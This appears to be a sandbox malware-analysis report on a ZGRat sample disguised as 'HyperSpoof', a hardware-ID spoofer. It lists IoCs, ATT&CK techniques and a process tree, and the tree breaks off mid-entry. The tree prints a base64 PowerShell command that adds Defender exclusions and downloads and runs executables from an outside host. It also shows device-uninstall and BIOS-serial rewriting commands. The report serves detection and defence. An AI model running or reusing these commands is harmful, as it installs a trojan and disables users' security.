zgrat | 21ec1141e55d4c21b89fb4be9e7692bf61681868f17cc78a9e691f44b911157c

Analysis

max time kernel
62s
max time network
146s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
16/03/2024, 02:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HyperSpoof (2024).rar
Size

57KB
MD5

4b99599c0946da5a5fb5d62aed8c9319
SHA1

008c6d784073a5bf9466de026f4baa46abcef253
SHA256

21ec1141e55d4c21b89fb4be9e7692bf61681868f17cc78a9e691f44b911157c
SHA512

0ec00a4bdcbcd3d28f198e932b24305a2f90d6623d87c0d62af1b35873f02eba51f64ae23b4d15c34a14456cf4fef85d9dc838a0b2290554c3e158ca2b4330f9
SSDEEP

1536:mqcYnM1m8fFzUsLvfxi4QvPawWeTgI2m/fB:mq/Mc8fFzdvg4uFTN2w

Score

10^/10

zgrat evasion persistence rat

Malware Config

Signatures

Detect ZGRat V1 6 IoCs

resource	yara_rule
behavioral1/files/0x0007000000014b18-149.dat	family_zgrat_v1
behavioral1/files/0x0007000000014b18-150.dat	family_zgrat_v1
behavioral1/files/0x0007000000014b18-153.dat	family_zgrat_v1
behavioral1/files/0x0007000000014b18-162.dat	family_zgrat_v1
behavioral1/files/0x0007000000014b18-163.dat	family_zgrat_v1
behavioral1/memory/612-164-0x0000000001280000-0x0000000001484000-memory.dmp	family_zgrat_v1

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2416	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1980	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2188	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1820	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	676	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2764	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1996	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2260	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2832	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2296	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1792	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1828	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1692	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1632	1556	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	344	1556	schtasks.exe	83

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Nirsoft 2 IoCs

resource	yara_rule
behavioral1/files/0x000e0000000054ab-115.dat	Nirsoft
behavioral1/files/0x000600000001469d-207.dat	Nirsoft

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	1304	powershell.exe
5	1304	powershell.exe
7	1304	powershell.exe

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 22 IoCs

pid	Process
1604	HyperSpoof.exe
704	HpsrSpoof.exe
1504	sphyperRuntimedhcpSvc.exe
552	conhostsft.exe
848	Volumeid64.exe
1076	.conhostsft.exe
612	.sphyperRuntimedhcpSvc.exe
3052	DevManView.exe
2972	DevManView.exe
2196	DevManView.exe
1904	DevManView.exe
2580	DevManView.exe
2624	DevManView.exe
1688	DevManView.exe
2492	DevManView.exe
2504	DevManView.exe
1016	DevManView.exe
2520	DevManView.exe
2464	DevManView.exe
2484	DevManView.exe
2428	DevManView.exe
2524	DevManView.exe

Loads dropped DLL 8 IoCs

pid	Process
1304	powershell.exe
2408	cmd.exe
1216	Process not Found
1504	sphyperRuntimedhcpSvc.exe
1504	sphyperRuntimedhcpSvc.exe
552	conhostsft.exe
552	conhostsft.exe
2556	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	pastebin.com
9	pastebin.com

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2524	sc.exe
2304	sc.exe
2604	sc.exe
348	sc.exe
316	sc.exe
1628	sc.exe
2012	sc.exe
2512	sc.exe
2916	sc.exe
1748	sc.exe
588	sc.exe
1956	sc.exe
2756	sc.exe
1616	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2832	schtasks.exe
2296	schtasks.exe
1828	schtasks.exe
1692	schtasks.exe
1632	schtasks.exe
2416	schtasks.exe
2188	schtasks.exe
1996	schtasks.exe
1792	schtasks.exe
676	schtasks.exe
2764	schtasks.exe
344	schtasks.exe
1820	schtasks.exe
2260	schtasks.exe
1980	schtasks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1652	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1604	HyperSpoof.exe
1604	HyperSpoof.exe
1604	HyperSpoof.exe
1604	HyperSpoof.exe
1604	HyperSpoof.exe
1604	HyperSpoof.exe
1304	powershell.exe
1304	powershell.exe
1304	powershell.exe
1304	powershell.exe
1304	powershell.exe
1304	powershell.exe
1304	powershell.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe
612	.sphyperRuntimedhcpSvc.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2796	7zFM.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

description	pid	Process
Token: SeRestorePrivilege	2796	7zFM.exe
Token: 35	2796	7zFM.exe
Token: SeSecurityPrivilege	2796	7zFM.exe
Token: SeDebugPrivilege	1604	HyperSpoof.exe
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeDebugPrivilege	612	.sphyperRuntimedhcpSvc.exe
Token: SeBackupPrivilege	2972	DevManView.exe
Token: SeRestorePrivilege	2972	DevManView.exe
Token: SeTakeOwnershipPrivilege	2972	DevManView.exe
Token: SeBackupPrivilege	2196	DevManView.exe
Token: SeRestorePrivilege	2196	DevManView.exe
Token: SeTakeOwnershipPrivilege	2196	DevManView.exe
Token: SeBackupPrivilege	1904	DevManView.exe
Token: SeRestorePrivilege	1904	DevManView.exe
Token: SeTakeOwnershipPrivilege	1904	DevManView.exe
Token: SeBackupPrivilege	3052	DevManView.exe
Token: SeRestorePrivilege	3052	DevManView.exe
Token: SeTakeOwnershipPrivilege	3052	DevManView.exe
Token: SeBackupPrivilege	2580	DevManView.exe
Token: SeRestorePrivilege	2580	DevManView.exe
Token: SeTakeOwnershipPrivilege	2580	DevManView.exe
Token: SeBackupPrivilege	1688	DevManView.exe
Token: SeRestorePrivilege	1688	DevManView.exe
Token: SeTakeOwnershipPrivilege	1688	DevManView.exe
Token: SeBackupPrivilege	2624	DevManView.exe
Token: SeRestorePrivilege	2624	DevManView.exe
Token: SeTakeOwnershipPrivilege	2624	DevManView.exe
Token: SeBackupPrivilege	2492	DevManView.exe
Token: SeRestorePrivilege	2492	DevManView.exe
Token: SeTakeOwnershipPrivilege	2492	DevManView.exe
Token: SeImpersonatePrivilege	2972	DevManView.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2796	7zFM.exe
2796	7zFM.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2904 wrote to memory of 2796	2904	cmd.exe	29
PID 2904 wrote to memory of 2796	2904	cmd.exe	29
PID 2904 wrote to memory of 2796	2904	cmd.exe	29
PID 1604 wrote to memory of 1304	1604	HyperSpoof.exe	34
PID 1604 wrote to memory of 1304	1604	HyperSpoof.exe	34
PID 1604 wrote to memory of 1304	1604	HyperSpoof.exe	34
PID 1304 wrote to memory of 704	1304	powershell.exe	36
PID 1304 wrote to memory of 704	1304	powershell.exe	36
PID 1304 wrote to memory of 704	1304	powershell.exe	36
PID 1304 wrote to memory of 1504	1304	powershell.exe	38
PID 1304 wrote to memory of 1504	1304	powershell.exe	38
PID 1304 wrote to memory of 1504	1304	powershell.exe	38
PID 1304 wrote to memory of 1504	1304	powershell.exe	38
PID 1304 wrote to memory of 552	1304	powershell.exe	39
PID 1304 wrote to memory of 552	1304	powershell.exe	39
PID 1304 wrote to memory of 552	1304	powershell.exe	39
PID 1304 wrote to memory of 552	1304	powershell.exe	39
PID 704 wrote to memory of 2408	704	HpsrSpoof.exe	40
PID 704 wrote to memory of 2408	704	HpsrSpoof.exe	40
PID 704 wrote to memory of 2408	704	HpsrSpoof.exe	40
PID 2408 wrote to memory of 848	2408	cmd.exe	42
PID 2408 wrote to memory of 848	2408	cmd.exe	42
PID 2408 wrote to memory of 848	2408	cmd.exe	42
PID 1504 wrote to memory of 612	1504	sphyperRuntimedhcpSvc.exe	43
PID 1504 wrote to memory of 612	1504	sphyperRuntimedhcpSvc.exe	43
PID 1504 wrote to memory of 612	1504	sphyperRuntimedhcpSvc.exe	43
PID 1504 wrote to memory of 612	1504	sphyperRuntimedhcpSvc.exe	43
PID 552 wrote to memory of 1076	552	conhostsft.exe	44
PID 552 wrote to memory of 1076	552	conhostsft.exe	44
PID 552 wrote to memory of 1076	552	conhostsft.exe	44
PID 552 wrote to memory of 1076	552	conhostsft.exe	44
PID 704 wrote to memory of 2556	704	HpsrSpoof.exe	45
PID 704 wrote to memory of 2556	704	HpsrSpoof.exe	45
PID 704 wrote to memory of 2556	704	HpsrSpoof.exe	45
PID 2556 wrote to memory of 3052	2556	cmd.exe	224
PID 2556 wrote to memory of 3052	2556	cmd.exe	224
PID 2556 wrote to memory of 3052	2556	cmd.exe	224
PID 2556 wrote to memory of 2972	2556	cmd.exe	48
PID 2556 wrote to memory of 2972	2556	cmd.exe	48
PID 2556 wrote to memory of 2972	2556	cmd.exe	48
PID 2556 wrote to memory of 2196	2556	cmd.exe	49
PID 2556 wrote to memory of 2196	2556	cmd.exe	49
PID 2556 wrote to memory of 2196	2556	cmd.exe	49
PID 2556 wrote to memory of 1904	2556	cmd.exe	50
PID 2556 wrote to memory of 1904	2556	cmd.exe	50
PID 2556 wrote to memory of 1904	2556	cmd.exe	50
PID 2556 wrote to memory of 2580	2556	cmd.exe	230
PID 2556 wrote to memory of 2580	2556	cmd.exe	230
PID 2556 wrote to memory of 2580	2556	cmd.exe	230
PID 2556 wrote to memory of 2624	2556	cmd.exe	171
PID 2556 wrote to memory of 2624	2556	cmd.exe	171
PID 2556 wrote to memory of 2624	2556	cmd.exe	171
PID 2556 wrote to memory of 1688	2556	cmd.exe	53
PID 2556 wrote to memory of 1688	2556	cmd.exe	53
PID 2556 wrote to memory of 1688	2556	cmd.exe	53
PID 2556 wrote to memory of 2492	2556	cmd.exe	54
PID 2556 wrote to memory of 2492	2556	cmd.exe	54
PID 2556 wrote to memory of 2492	2556	cmd.exe	54
PID 2556 wrote to memory of 2504	2556	cmd.exe	55
PID 2556 wrote to memory of 2504	2556	cmd.exe	55
PID 2556 wrote to memory of 2504	2556	cmd.exe	55
PID 2556 wrote to memory of 1016	2556	cmd.exe	111
PID 2556 wrote to memory of 1016	2556	cmd.exe	111
PID 2556 wrote to memory of 1016	2556	cmd.exe	111

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\HyperSpoof (2024).rar"
1⤵
- Suspicious use of WriteProcessMemory
PID:2904
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\HyperSpoof (2024).rar"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2796

C:\Users\Admin\Desktop\HyperSpoof.exe
"C:\Users\Admin\Desktop\HyperSpoof.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeQB0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQB0AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBjAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwByAHYAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAcwBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHYAegB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAG4AZgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB3AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBnAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAdwBnAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAGcAYwB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB2AHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABmAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBnAHgAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAGYAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQB3AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABwAHMAcgBTAHAAbwBvAGYALgBlAHgAZQAnACkAPAAjAGgAaAB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZgB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHAAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAeAB2AGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAZQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACkAPAAjAGsAYwBwACMAPgA="
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1304
- - C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
    "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:704
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: TJH9-2OTU
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2408
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: TJH9-2OTU
        5⤵
        Executes dropped EXE
        
        PID:848
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2556
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3052
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2972
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2196
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1904
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2580
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1688
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2492
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
        5⤵
        Executes dropped EXE
        
        PID:2504
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
        5⤵
        Executes dropped EXE
        
        PID:1016
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
        5⤵
        Executes dropped EXE
        
        PID:2520
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
        5⤵
        Executes dropped EXE
        
        PID:2464
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
        5⤵
        Executes dropped EXE
        
        PID:2484
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
        5⤵
        Executes dropped EXE
        
        PID:2428
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
        5⤵
        Executes dropped EXE
        
        PID:2524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:1548
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 29653HP-TRGT26739AB
        5⤵
        
        PID:1544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:1780
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 229656HP-TRGT4720RV
        5⤵
        
        PID:2080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:2560
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 829659HP-TRGT15468SG
        5⤵
        
        PID:1208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:1952
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        
        PID:2820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:2640
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 529659HP-TRGT15468SL
        5⤵
        
        PID:1348
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:2088
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 429659HP-TRGT15468FA
        5⤵
        
        PID:1452
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:2064
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 629662HP-TRGT26216FU
        5⤵
        
        PID:2276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:324
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 329662HP-TRGT26216DQ
        5⤵
        
        PID:536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:336
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 729662HP-TRGT26216MST
        5⤵
        
        PID:928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:3036
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        
        PID:1120
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:2268
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 29679HP-TRGT14422AB
        5⤵
        
        PID:2656
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:2884
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 229679HP-TRGT14422RV
        5⤵
        
        PID:1712
  - - C:\Windows\System32\cmd.exe
